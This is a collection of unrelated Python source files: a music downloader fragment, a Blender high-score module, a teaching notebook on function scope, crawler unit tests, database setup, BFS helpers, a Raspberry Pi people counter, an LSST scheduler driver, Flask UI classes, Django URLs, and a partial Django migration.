print(str("Now downloading: "+replacement_title))
# Check if file already exists
if check_existence(replacement_title):
print("This file already exists in the downloads folder. Skipping it.\n")
continue
if FORMAT_MP3:
get_mp3(replacement_title, ids[i])
else:
get_m4a(replacement_title, ids[i])
print("\nBoom. Done. Rejoice in your piracy now.")
|
19,749 | b3b5365cc0d25dc5049bdf2e348edcbd1cd7e3e2 | from bge import logic
import pickle
scores_file_path = logic.expandPath('//scores/scores.txt')
def _saveScoresToFile(scores_file_path, scores):
scores_file = open(scores_file_path, 'wb')
pickle.dump(scores, scores_file)
scores_file.close()
def _loadScoresFromFile(scores_file_path):
try:
file = open(scores_file_path, 'rb')
return pickle.load(file)
except IOError:
print('Unable to load scores.txt at "{}":'.format(scores_file_path))
print('...will create one at game over')
return []
scores = _loadScoresFromFile(scores_file_path)
def display():
scene = logic.getCurrentScene()
writer = scene.objectsInactive['Writer']
name = logic.globalDict['Name']
last_score = logic.globalDict['Score']
entry = (name, last_score)
scores.append(entry)
# we have to sort scores, but scores it's a list of tuples
scores.sort(key = lambda entry : entry[1], reverse = True)
last_entry_index = scores.index(entry)
for entry, i in zip (scores, range(10)):
spawened_in_writer = scene.addObject(writer, writer)
spawened_in_writer.localScale = writer.localScale
spawened_in_writer.worldPosition.y -= 0.5*i
spawened_in_writer.text = '{:d} - {:s} - {:.3f}'.format(i+1, entry[0], entry[1])
if i == last_entry_index:
spawened_in_writer.state = 1
_saveScoresToFile(scores_file_path, scores)
def setName():
scene = logic.getCurrentScene()
name = scene.objects['Name']
logic.globalDict["Name"] = name.text.strip()
def setScore():
scene = logic.getCurrentScene()
last_score = scene.objects['Timer']['Text']
logic.globalDict['Score'] = last_score
|
19,750 | 48a464a56a83edac7bb76eb8a7419ddbc654d388 | print(5/2)
tax=5/2
print(tax) |
19,751 | b819152021e04110cb3e14d6b8566d390234fd2d | # -*- coding: utf-8 -*-
"""
The Extractor receives a URL and tries to estimate its type
(HTML, PDF, XML...)
"""
import datetime
from bs4 import BeautifulSoup
from urllib import request
from logzero import logger
class Extractor(object):
def __init__(self, parser="", url=""):
self.initTime = datetime.datetime.now().timestamp()
self.url = url
self.parser = parser
def parseUrl(self, url):
assert isinstance(url, basestring), "argument url must be a string"
self.url = url
with request.urlopen(self.url) as response:
html = response.read().decode('utf8')
self.soup = BeautifulSoup(html, self.parser)
return self.soup.get_text()
def __exit__(self):
self.endTime = datetime.datetime.now().timestamp()
logger.info(self.initTime - self.endTime)
|
19,752 | 84e160fa3848dc9c25b24e697654ddff68f6be78 |
# coding: utf-8
# # [CptS 111 Introduction to Algorithmic Problem Solving](http://piazza.com/wsu/fall2016/cpts111/home)
# [Washington State University](https://wsu.edu)
#
# [Gina Sprint](http://eecs.wsu.edu/~gsprint/)
# # L4-2 More Functions
#
# Learner objectives for this lesson
# * Understand why functions are useful to use when designing programs and solving problems
# * Understand the execution flow of a program
# * Recognize the scope of a name (identifier)
# ## Why Use Functions?
# * Break a large, complex solution into logical units
# * Individual members of a programming team can work on each unit independently
# * Procedural abstraction
# * The calling function need not be aware of the details of how a function works—just what it does
# * Thus, during high-level problem solving activities, we won't get bogged down in detail
# * Reuse
# * Recall our comment on the original version of the program to compute and display the gpa of classes
# * Redundant: Much code was duplicated
# * Why re-write sections of code that have already been written and tested?
# * Functions allow us to package up a well-designed solution into a **bite-size chunk that can be reused over and over**
# * Name a group of statements for easier reading and debugging
# * Testing
# * Allows for more efficient testing and bug resolution
# * Each function is tested as it is implemented
#
# ## How Functions are Executed
# * When a function is called, memory for local variables is allocated
# * Memory is released upon completion of function execution (local function variables do not "outlive" function)
#
# Example: Recall the function `display_gpa()`:
# In[5]:
def display_gpa(gpa):
'''
Displays the final gpa to the user.
'''
print("Your GPA is: %.2f" %(gpa))
# In a function call such as `display_gpa(3.4)`, the value 3.4 is considered the argument of the function. When the function is executed, the value 3.4 is *copied* into a **new local variable**, `gpa`. We call `gpa` a local variable because the variable is only accessible within `display_gpa()` on this particular functional call (`display_gpa(3.4)`).
#
# ## Scope
# **Scope of a name**: region of a program where a particular meaning of a name is viible or can be referenced.
#
# ### Global Variables
# Variables declared outside of a function are considered *global*. In general, global variables are a [bad idea](http://c2.com/cgi/wiki?GlobalVariablesAreBad) and we try to avoid using them.
#
# ### Local Variables
# Parameter variables and variables declared within a function are considered *local*. Local variables are only visible from within that function; once function is done, variables go away (space is deallocated). Consider the following example:
# In[3]:
max_val = 950
def one(anarg, second):
'''
'''
one_local = 0
def fun_two(one, anarg):
'''
'''
local_var = 0
def main():
'''
'''
local_var = 0
one(0, 1)
fun_two(5, 10)
main()
limit = 200
# When each of the above functions is executed, what is the scope of the following identifiers?
#
# |Name|visible in `one()`|visible in `fun_two()`|visible in `main()`|
# |----|------------------|----------------------|-------------------|
# |`max_val`|y|y|y|
# |`limit`|n|n|n|
# |`main`|y|y|y|
# |`local_var` (local variable in `main()`)|n|n|y|
# |`one` (function)|y|n|y|
# |`anarg` (parameter in `one()`)|y|n|n|
# |`second`|y|n|n|
# |`one_local`|y|n|n|
# |`fun_two`|y|y|y|
# |`one` (parameter in `fun_two()`)|n|y|n|
# |`anarg` (parameter in `fun_two()`)|n|y|n|
# |`local_var` (local variable in `fun_two()`)|n|y|n|
# ## Body-less Functions
# You can define a function without adding a body by simply placing the reserved keyword `pass` in the body. This can be useful when you want to test your program one function at a time or when you want to organize your program without actually writing the functions (or as a placeholder if someone else is writing the function). Example:
# In[7]:
def quadratic_root_finder(a, b, c):
'''
Applies the quadratic equation to find the roots of a quadratic function specified by the formula ax^2 + bx + c = 0
To efficiently be implemented by someone else!
'''
pass
# ## Function Testing
# Each function is itself a small-scale "program"
# * It has inputs
# * It has expected outputs or side-effects
# * Ideally, it is a self-contained "black box" (does not manipulate global variables)
# It makes sense to test each function independently
# * Correctness can be verified before it is used in a larger scale application
# A *test-driver* is a short program that tests a specific function
#
# ## TODO
# 1. Read chapter 3 in the textbook.
# 1. Work on PA2
#
# ## Next Lesson
# Debugging programs and function practice!
|
19,753 | 2f1b2a0c94c115d8feb6719ffbed5020308fccf2 | import unittest
from general import *
class Test_General(unittest.TestCase):
def test_create_project_directory(self):
directory = 'elective_dummy'
create_project_directory(directory) # testing this method
is_created = False
if os.path.exists(directory):
is_created = True
self.assertTrue(is_created)
def test_create_data_files(self):
project_name = 'elective_dummy'
base_url = 'https://clbokea.github.io/exam/'
queue = project_name + "/queue.txt"
crawled = project_name + "/crawled.txt"
contents = project_name + "/contents.md"
is_created_queue = False
is_created_crawled = False
is_created_contents = False
create_data_files(project_name, base_url) # testing this method
if os.path.exists(queue):
is_created_queue = True
if os.path.exists(crawled):
is_created_crawled = True
if os.path.exists(contents):
is_created_contents = True
self.assertTrue(is_created_queue, 'did not create file: ' + queue)
self.assertTrue(is_created_crawled, 'did not create file: ' + crawled)
self.assertTrue(is_created_contents, 'did not create file: ' + contents)
def test_write_file(self):
project_name = 'elective_dummy'
contents = project_name + "/contents.md"
path = contents
data = 'this is some test data'
write_file(path, data) # testing this method
f = open(path, "r")
resultData = f.read()
self.assertEqual(resultData, data, 'did not write correctly to file, expected: ' + data + ' got: ' + data)
def test_add_md_formatting(self):
contents = []
header1Tag = 'h1im a header tag'
header1TagResult = '\n# im a header tag\n'
header2Tag = 'h2im a header2 tag'
header2Tag_result = '\n## im a header2 tag'
## p tags tests
ptag = 'pim a p tag'
ptag_result = 'im a p tag '
## p tags to ignore
p_tag_pNote = 'pNote im a pNote tag'
p_tag_pAssignment = 'pAssignment im a pAssignment'
p_tag_pre = 'pre< im a pre< tag'
p_tag_pHashtag = 'p# im a p#'
litag = 'liim a li tag'
litag_result = '\n* im a li tag'
atag = 'aim a a tag'
atag_result = 'im a a tag'
contents.append(header1Tag)
contents.append(header2Tag)
contents.append(ptag)
contents.append(litag)
contents.append(atag)
contents.append(p_tag_pNote)
contents.append(p_tag_pAssignment)
contents.append(p_tag_pre)
contents.append(p_tag_pHashtag)
formatted_list = add_md_formatting(contents)
self.assertEqual(formatted_list[0], header1TagResult, 'did not format correctly. \nExpected: ' + header1TagResult + '\nGot: ' + contents[0])
self.assertEqual(formatted_list[1], header2Tag_result, 'did not format correctly. \nExpected: ' + header2Tag_result + '\nGot: ' + contents[1])
self.assertEqual(formatted_list[2], ptag_result, 'did not format correctly. \nExpected: ' + ptag_result + '\nGot: ' + contents[2])
self.assertEqual(formatted_list[3], litag_result, 'did not format correctly. \nExpected: ' + litag_result + '\nGot: ' + contents[3])
self.assertEqual(formatted_list[4], atag_result, 'did not format correctly. \nExpected: ' + atag_result + '\nGot: ' + contents[4])
self.assertNotIn(p_tag_pNote, formatted_list, 'did not format correctly. \nThis item: ' + p_tag_pNote + '\nShould not be added to the list.')
self.assertNotIn(p_tag_pAssignment, formatted_list, 'did not format correctly. \nThis item: ' + p_tag_pAssignment + '\nShould not be added to the list.')
self.assertNotIn(p_tag_pre, formatted_list, 'did not format correctly. \nThis item: ' + p_tag_pre + '\nShould not be added to the list.')
self.assertNotIn(p_tag_pHashtag, formatted_list, 'did not format correctly. \nThis item: ' + p_tag_pHashtag + '\nShould not be added to the list.')
if __name__ == '__main__':
unittest.main() |
19,754 | bb9a46af854732c6f9c514b63b13f8caf1098640 | from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
import os
SQLALCHEMY_DATABASE_URL: str = 'mysql+pymysql://{0}:{1}@{2}:3308/{3}'.format( # noqa: E501
os.environ.get('DB_USERNAME', ''),
os.environ.get('DB_PASSWORD', ''),
os.environ.get('DB_HOST', ''),
os.environ.get('DB_SCHEMA', '')
)
Engine = create_engine(
SQLALCHEMY_DATABASE_URL,
pool_pre_ping=True
)
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=Engine)
Base = declarative_base()
def get_session():
try:
session = SessionLocal()
yield session
finally:
session.close()
|
19,755 | 7e49e4a1c05a42e2b2338612b068002b8de53781 | import sqlite3
mydb = sqlite3.connect('pokedex.db')
curs = mydb.cursor()
curs.execute('''SELECT max(base_experience),species_id FROM POKEMON GROUP BY species_id ORDER BY base_experience DESC LIMIT 3;''')
result = curs.fetchall()
for row in result:
print(row[0])
mydb.commit()
mydb.close()
|
19,756 | 95b99d5d49aff9141e06078d75419d7ab2db092e |
def bfs01(N, E, s, INF=10**10):
from collections import deque
# N: vertex
# E[i] = [vetices connected to i]
# s: start
V = [INF]*N
d = deque([s])
V[s] = 0
while d:
v = d.popleft()
now = V[v]
for w in E[v]:
if V[w] < INF:
continue
V[w] = now+1
d.append(w)
# print(V)
return V
def bfs02(N, E, s, g, INF=10**10):
from collections import deque
# N: vertex
# E[i] = [vetices connected to i]
# s: start
# g: goal
INF = 10**10
V = [INF]*N
d = deque([s])
V[s] = 0
while d:
v = d.popleft()
now = V[v]
for w in E[v]:
if V[w] < INF:
continue
if w == g:
return now+1
V[w] = now+1
d.append(w)
# print(V)
return V
|
19,757 | e009846595ca9371ff2c77cc905a22792eeefe28 | import RPi.GPIO as GPIO
import time
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BOARD)
GPIO.setup(7, GPIO.IN) #Read output from IR motion sensor
GPIO.setup(11, GPIO.IN) #Read output from IR motion sensor
count = 0 #Total count of persons
both_high = 0 #Flag equals 1 when both sensors in HIGH state
isIncreased = 0 #Flag equals 1 when count increased
isDecreased = 0 #Flag equals 1 when count decreased
while True:
k=GPIO.input(11)
i=GPIO.input(7)
if both_high:
if k==0 and isIncreased:
count = count-1
print "Intruders decrease(Both sensors were blocked) =",count
time.sleep(.5)
if i==0 and isDecreased:
count = count+1
print "Intruders increase(Both sensors were blocked) =",count
time.sleep(.5)
if k and i: #If both sensor values HIGH then check the values again
both_high = 1
continue
j=0
both_high = 0
isIncreased = 0
isDecreased = 0
#i=GPIO.input(7)
if k==1: #When output from 1st motion sensor is LOW
t_end=time.time()+2
while time.time()<t_end:
j=GPIO.input(7)
if j==1: #When output from 2nd motion sensor is LOW
count=count-1
isDecreased = 1
time.sleep(.5)
break
if isDecreased:
print "Intruders decrease =",count
time.sleep(0.1)
elif i==1: #When output from 2nd motion sensor is HIGH
t_end=time.time()+2
while time.time()<t_end:
j=GPIO.input(11)
if j==1: #When output from 1st motion sensor is LOW
count=count+1
isIncreased = 1
time.sleep(.5)
break
if isIncreased:
print "Intruders increase =",count
time.sleep(0.1)
|
19,758 | f546d59e8ae5aa969ee552c619f79870775ab97e | # This file is part of ts_scheduler
#
# Developed for the LSST Telescope and Site Systems.
# This product includes software developed by the LSST Project
# (https://www.lsst.org).
# See the COPYRIGHT file at the top-level directory of this distribution
# for details of code ownership.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
import io
import logging
import os
import types
import typing
from dataclasses import dataclass
import pandas
from lsst.ts import observing
from .driver_target import DriverTarget
from .observation import Observation
from .survey_topology import SurveyTopology
__all__ = ["Driver", "DriverParameters"]
WORDY = logging.DEBUG - 5
@dataclass
class DriverParameters:
"""Actual global driver configuration parameters.
This can be expanded for other scheduler drivers. For instance, if your
scheduler uses a certain configuration file it is possible to subclass
this and add the required parameters (e.g. file paths or else). Then,
replace `self.params` on the Driver by the subclassed configuration.
"""
night_boundary: float = -12.0
new_moon_phase_threshold: float = 20.0
def setDefaults(self) -> None:
"""Set defaults for the LSST Scheduler's Driver."""
self.night_boundary = -12.0
self.new_moon_phase_threshold = 20.0
class Driver:
"""The Scheduler Driver is the module that normalizes the interface between
any scheduling algorithm to the LSST Scheduler CSC. The interface
implements three main behaviours; configure an underlying algorithm,
request targets and register successful observations.
If the Scheduler algorithm requires a specific set of parameters the user
must subclass `DriverParameters`, in the same module as the `Driver`, and
add the appropriate parameters using the LSST pexConfig module.
Access to the telemetry stream and models are also interfaced by `Driver`.
The full list of default available telemetry data is shown in the
scheduler_csc module. Nevertheless, the full list of telemetry may vary
depending on the models used. The user has control over this while
configuring the Scheduler CSC.
Parameters
----------
models: `dict`
A dictionary with models available for the scheduling algorithm.
raw_telemetry: `dict`
A dictionary with available raw telemetry.
observing_blocks : dict[str, observing.ObservingBlock]
Observing blocks.
parameters: `DriverParameters`, optional
Input functional parameters for the scheduling algorithm.
log: `Logger`
Parent logger class.
Attributes
----------
log: `Logger`
Logger class.
parameters: `DriverParameters`
Store functional driver parameters.
models: `dict`
Dictionary with models.
raw_telemetry: `dict`
Dictionary with raw telemetry data.
target_id: `int`
Counter of the number of targets generated by the scheduler since it
was last instantiated.
observing_blocks : dict[str, observing.ObservingBlock]
Observing blocks.
stop_tracking_script_name: `str`
Name of a SAL Script that can be used to stop the observatory. This is,
in general, queued by the Driver when it fails to select an
observation.
stop_tracking_script_is_standard: `bool`
Specify if the stop tracking script is standard.
is_night: `bool`
Track if it is night time.
night: `int`
Count the number of nights from the start of the survey.
current_sunset: `float`
Timestamp for the current sunset.
current_sunrise: `float`
Timestamp for the current sunrise.
"""
def __init__(
self,
models: dict[str, typing.Any],
raw_telemetry: dict[str, typing.Any],
observing_blocks: dict[str, observing.ObservingBlock],
parameters: DriverParameters | None = None,
log: logging.Logger | None = None,
) -> None:
if log is None:
self.log = logging.getLogger(type(self).__name__)
else:
self.log = log.getChild(type(self).__name__)
if parameters is None:
self.parameters = DriverParameters()
else:
self.parameters = parameters
self.models = models
self.raw_telemetry = raw_telemetry
self.targetid = 0
self.observing_blocks = observing_blocks
self.stop_tracking_script_name = None
self.stop_tracking_script_is_standard = None
self.is_night = None
self.night = 1
self.current_sunset = None
self.current_sunrise = None
def configure_scheduler(self, config: types.SimpleNamespace) -> SurveyTopology:
"""This method is responsible for running the scheduler configuration
and returning the survey topology, which specifies the number, name
and type of projects running by the scheduler.
By default it will just return a test survey topology.
Parameters
----------
config : `types.SimpleNamespace`
Configuration, as described by ``schema/Scheduler.yaml``
Returns
-------
survey_topology : ``SurveyTopology``
Survey topology.
"""
if "parameters" in config.driver_configuration:
for parameter in config.driver_configuration["parameters"]:
value = config.driver_configuration["parameters"][parameter]
self.log.debug(f"Setting driver parameter: {parameter} = {value}")
setattr(
self.parameters,
parameter,
value,
)
if not hasattr(config, "driver_configuration"):
raise RuntimeError(
"No driver_configuration section defined in configuration."
)
return self.get_survey_topology(config)
def get_survey_topology(self, config: types.SimpleNamespace) -> SurveyTopology:
"""Get the survey topology.
Parameters
----------
config : `types.SimpleNamespace`
Configuration, as described by ``schema/Scheduler.yaml``
Returns
-------
survey_topology : ``SurveyTopology``
Survey topology.
"""
survey_topology = SurveyTopology()
survey_topology.general_propos = config.driver_configuration.get(
"general_propos", []
)
survey_topology.sequence_propos = config.driver_configuration.get(
"sequence_propos", []
)
survey_topology.num_general_props = len(survey_topology.general_propos)
survey_topology.num_seq_props = len(survey_topology.sequence_propos)
self.stop_tracking_script_name = config.driver_configuration[
"stop_tracking_observing_script_name"
]
self.stop_tracking_script_is_standard = config.driver_configuration[
"stop_tracking_observing_script_is_standard"
]
return survey_topology
def cold_start(self, observations: list[Observation]) -> None:
"""Rebuilds the internal state of the scheduler from a list of
observations.
Parameters
----------
observations : `list`[`Observation`]
List of observations.
"""
raise NotImplementedError("Cold start is not implemented.")
def update_conditions(self) -> None:
"""Update driver internal conditions.
When subclassing this method, make sure to call it at the start of the
method, as it performs operations like running the observatory through
the current targets on the queue.
"""
self.log.debug("Updating conditions.")
self.models["sky"].update(self.models["observatory_state"].time)
if self.is_night is None:
self.log.debug("Driver not initialized yet. Computing night parameters.")
# Driver was not initialized yet. Need to compute night
# boundaries
(self.current_sunset, self.current_sunrise) = self.models[
"sky"
].get_night_boundaries(self.parameters.night_boundary)
self.is_night = (
self.current_sunset
<= self.models["observatory_state"].time
< self.current_sunrise
)
self.log.debug(
f"Sunset/Sunrise: {self.current_sunset}/{self.current_sunrise}, "
f"sun @ {self.parameters.night_boundary} degrees."
)
is_night = self.is_night
self.is_night = (
self.current_sunset
<= self.models["observatory_state"].time
< self.current_sunrise
)
# Only compute night boundaries when we transition from nighttime to
# daytime. Possibilities are:
# 1 - self.is_night=True and is_night = True: During the night (no need
# to compute anything).
# 2 - self.is_night=False and is_night = True: Transitioned from
# night/day (need to recompute night boundaries).
# 3 - self.is_night=True and is_night = False: Transitioned from
# day/night (no need to compute anything).
# 4 - self.is_night=False and is_night = False: During the day, no need
# to compute anything.
if not self.is_night and is_night:
self.log.debug(
"Night over. Computing next night boundaries. "
f"Assuming sun elevation of {self.parameters.night_boundary}."
)
self.night += 1
(self.current_sunset, self.current_sunrise) = self.models[
"sky"
].get_night_boundaries(self.parameters.night_boundary)
self.log.debug(
f"[{self.night}]: Sunset/Sunrise: {self.current_sunset}/{self.current_sunrise} "
)
def select_next_target(self) -> DriverTarget:
"""Picks a target and returns it as a target object.
By default it will just return a dummy test target.
Returns
-------
`DriverTarget`
"""
self.log.log(WORDY, "Selecting next target.")
self.targetid += 1
target = DriverTarget(
observing_block=next(iter(self.observing_blocks.values())),
targetid=self.targetid,
)
target.num_exp = 2
target.exp_times = [15.0, 15.0]
target.num_props = 1
target.propid_list = [0]
return target
def select_next_targets(self) -> list[DriverTarget]:
"""Select a list of targets.
By default it will just return a dummy test target.
Returns
-------
`list` [`DriverTarget`]
"""
return [self.select_next_target()]
def register_observed_target(self, target: DriverTarget) -> Observation:
"""Validates observed target and returns an observation.
Parameters
----------
target : `DriverTarget`
Observed target to register.
Returns
-------
`Observation`
Registered observation.
"""
self.log.log(WORDY, "Registering target %s.", target)
return target.get_observation()
def register_observation(self, target: DriverTarget) -> None:
"""Register observations.
This method should store the observation in a way that can be retrieved
afterwards by the driver.
The default implementation is not implemented.
Parameters
----------
target : `DriverTarget`
Observation to register.
"""
self.register_observed_target(target=target)
def get_stop_tracking_target(self) -> DriverTarget:
stop_tracking_block = observing.ObservingBlock(
name="StopTracking",
program="_Internal",
constraints=[],
scripts=[
observing.ObservingScript(
name=self.stop_tracking_script_name,
standard=self.stop_tracking_script_is_standard,
parameters=dict(),
)
],
)
target = DriverTarget(
observing_block=stop_tracking_block,
targetid=self.targetid,
)
return target
def load(self, config: str) -> None:
"""Load a modifying configuration.
The input is a file that the Driver must be able to parse. It should
contain that the driver can parse to reconfigure the current scheduler
algorithm. For instance, it could contain new targets to add to a queue
or project.
Each Driver must implement its own load method. This method just checks
that the file exists.
Parameters
----------
config : `str`
Configuration to load
Raises
------
RuntimeError:
If input configuration file does not exists.
"""
if not os.path.exists(config):
raise RuntimeError(f"Input configuration file {config} does not exist.")
def save_state(self) -> None:
"""Save the current state of the scheduling algorithm to a file.
Returns
-------
filename: `str`
The name of the file with the state.
"""
raise NotImplementedError("Save state is is not implemented.")
def parse_observation_database(self, filename: str) -> None:
"""Parse an observation database into a list of observations.
Parameters
----------
filename : `str`
Returns
-------
observations : `list` of `DriverTarget`
"""
raise NotImplementedError("Parse observation database not implemented.")
def get_state_as_file_object(self) -> io.BytesIO:
"""Get the current state of the scheduling algorithm as a file object.
Returns
-------
file_object : `io.BytesIO`
File object with the current.
"""
raise NotImplementedError("Get state as file object not implemented.")
def reset_from_state(self, filename: str) -> None:
"""Load the state from a file."""
raise NotImplementedError("Reset from state is not implemented.")
def assert_survey_observing_script(self, survey_name: str) -> None:
"""Assert that the input survey name has a dedicated observing script.
Parameters
----------
survey_name : `str`
Name of the survey.
Raises
------
AssertError:
If `survey_name` is not in the list of valid survey observing
scripts.
"""
assert survey_name in self.observing_blocks, (
f"{survey_name} not in the list of observing blocks. "
f"Currently defined are: {set(self.observing_blocks.keys())}"
)
def get_survey_observing_block(self, survey_name: str) -> observing.ObservingBlock:
"""Return the appropriate survey observing block.
Parameters
----------
survey_name : `str`
Name of the survey.
Returns
-------
observing.ObservingBlock
Survey observing block.
"""
self.assert_survey_observing_script(survey_name=survey_name)
return self.observing_blocks[survey_name].copy(deep=True)
def convert_efd_observations_to_targets(
self, efd_observations: pandas.DataFrame
) -> typing.List[DriverTarget]:
"""Convert EFD dataframe into list of driver targets.
Parameters
----------
efd_observations : `pandas.DataFrame`
Data frame returned from a query to the EFD for observations.
"""
observations = []
for observation_data_frame in efd_observations.iterrows():
observations.append(
self._get_driver_target_from_observation_data_frame(
observation_data_frame=observation_data_frame
)
)
return observations
def _get_driver_target_from_observation_data_frame(
self, observation_data_frame: typing.Tuple[pandas.Timestamp, pandas.Series]
) -> DriverTarget:
"""Convert an observation data frame into a DriverTarget.
Parameters
----------
observation_data_frame : pandas.DataFrame
An observation data frame.
"""
return DriverTarget(
observing_script_name=self.default_observing_script_name,
observing_script_is_standard=self.default_observing_script_is_standard,
targetid=observation_data_frame["targetId"],
)
|
19,759 | 38f320ae9fa07e1a90e2f7dff964fda215cf6222 | from flask import Flask
from flask import render_template
import os
from os import path
import json
import csv
# This file defines the UI elements that can be made.
inputDataPath = "input.json"
flatten = lambda l: [item for sublist in l for item in sublist]
class UIElement:
def __init__(self,fieldname,classname,uiname,onupdate,myclass):
self.fieldname = fieldname
self.uiname = uiname
self.onupdate = onupdate
self.classname = classname
self.value = myclass.__dict__[fieldname]
self.myclass = myclass
def performUpdate(self):
if self.onupdate!=None:
getattr(self.myclass, self.onupdate)()
class Switch(UIElement):
def __init__(self,fieldname,classname,uiname,myclass,onupdate):
UIElement.__init__(self,fieldname,classname,uiname,onupdate,myclass)
def getInstructions(self):
return ["switch",self.classname,self.uiname,self.value]
def updateValue(self,_):
self.myclass.__dict__[self.fieldname] = not self.myclass.__dict__[self.fieldname]
class Slider(UIElement):
def __init__(self,fieldname,classname,uiname,min,max,myclass,onupdate):
UIElement.__init__(self,fieldname,classname,uiname,onupdate,myclass)
self.min = min
self.max = max
def getInstructions(self):
return ["slider",self.classname,self.uiname, self.min,self.max,self.value]
def updateValue(self,value):
self.myclass.__dict__[self.fieldname] = float(value)
class Button():
def __init__(self,classname,uiname,myclass,onclick):
self.uiname = uiname
self.onclick = onclick
self.classname = classname
self.myclass = myclass
def performUpdate(self):
if self.onclick!=None:
getattr(self.myclass, self.onclick)()
def getInstructions(self):
return ["button",self.classname,self.uiname]
def updateValue(self,value):
pass
class Dropdown(UIElement):
def __init__(self,fieldname,classname,uiname,myclass,options,optionlabels,onupdate):
UIElement.__init__(self,fieldname,classname,uiname,onupdate,myclass)
if isinstance(self.value, (list,)):
self.value = tuple(self.value)
try:
self.value = optionlabels[options.index((self.value))]
except:
for i,option in enumerate(options):
if type(option) == type(self.value):
self.value = optionlabels[i]
self.options = options
self.optionlabels = optionlabels
# Maybe also execute some callback in myclass
def getInstructions(self):
return ["dropdown",self.classname,self.uiname,self.value] + self.optionlabels
def updateValue(self,label):
self.myclass.__dict__[self.fieldname] = self.options[self.optionlabels.index(label)]
class AddingFigure():
def updateValues(self):
self.t += 0.01
self.y = [self.myclass.__dict__[yFieldName] for yFieldName in self.yfieldnames]
def __init__(self,myclass,xfieldName,yFieldNames,xname,ynames):
self.xfieldname = xfieldName
self.yfieldnames = yFieldNames
self.myclass = myclass
self.ynames= ynames
self.updatePol = "Add"
self.t = 0
self.y = [self.myclass.__dict__[yFieldName] for yFieldName in self.yfieldnames]
def getInstructions(self):
return ["figure",0,len(self.y),self.updatePol,"Time"] + self.ynames + [self.t] + self.y
def getUpdateInstructions(self):
self.updateValues()
return [1,len(self.y), self.t] + self.y
class ReplacingFigure():
def updateValues(self):
self.x = self.myclass.__dict__[self.xfieldname]
self.y = [self.myclass.__dict__[yFieldName] for yFieldName in self.yfieldnames]
def __init__(self,myclass,xfieldName,yFieldNames,xname,ynames):
self.xfieldname = xfieldName
self.yfieldnames = yFieldNames
self.xname = xname
self.myclass = myclass
self.ynames= ynames
self.updatePol = "Replace"
self.updateValues()
def getInstructions(self):
yflat =flatten(self.y)
print(yflat)
return ["figure",len(self.x),len(self.y),self.updatePol,self.xname] + self.ynames + list(self.x) + yflat
def getUpdateInstructions(self):
self.updateValues()
# A way to also update x may need to be added in the future.
return [len(self.x),len(self.y)] + list(self.x) + flatten(self.y)
|
19,760 | 5035bd63b6313f31d525fb6247d2218c7864be96 | from django.urls import include, path
from authen import views
urlpatterns = [
path('login', views.login, name='login'),
path('signup', views.signup, name='signup'),
path('postsign', views.postsign, name='postsign'),
path('create', views.create, name="create"),
path('postcreate', views.postcreate, name="postcreate")
]
|
19,761 | ddf29c3f29117e7243361ec426938d88ac31bc9d | # Generated by Django 2.0.4 on 2018-04-07 20:12
import django.contrib.postgres.fields
from django.db import migrations, models
import django.db.models.deletion
import django_extensions.db.fields
import iioy.core.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='CastMember',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('character_name', models.TextField(null=True)),
('order', models.PositiveIntegerField(default=0)),
],
options={
'ordering': ('order',),
},
),
migrations.CreateModel(
name='Genre',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('tmdb_id', models.TextField()),
('name', models.TextField()),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Movie',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('tmdb_id', models.TextField()),
('title', models.TextField()),
('original_title', models.TextField()),
('slug', iioy.core.fields.SlugField(slug_field='title')),
('tagline', models.TextField(null=True)),
('budget', models.BigIntegerField(null=True)),
('revenue', models.BigIntegerField(null=True)),
('homepage', models.URLField(null=True)),
('imdb_id', models.TextField()),
('synopsis', models.TextField(null=True)),
('runtime', models.IntegerField(null=True)),
('mpaa_rating', models.TextField(null=True)),
('release_date', models.DateField(null=True)),
('backdrop_url', models.URLField(null=True)),
('mobile_backdrop_url', models.URLField(null=True)),
('poster_url', models.URLField(null=True)),
('mobile_poster_url', models.URLField(null=True)),
('trailer_url', models.URLField(null=True)),
],
),
migrations.CreateModel(
name='MovieList',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('source', models.TextField()),
('name', models.TextField()),
('slug', iioy.core.fields.SlugField(slug_field='name')),
],
options={
'ordering': ('-modified', '-created'),
'get_latest_by': 'modified',
'abstract': False,
},
),
migrations.CreateModel(
name='MovieRating',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('source', models.TextField()),
('value', models.TextField()),
],
options={
'ordering': ('-modified', '-created'),
'get_latest_by': 'modified',
'abstract': False,
},
),
migrations.CreateModel(
name='Person',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
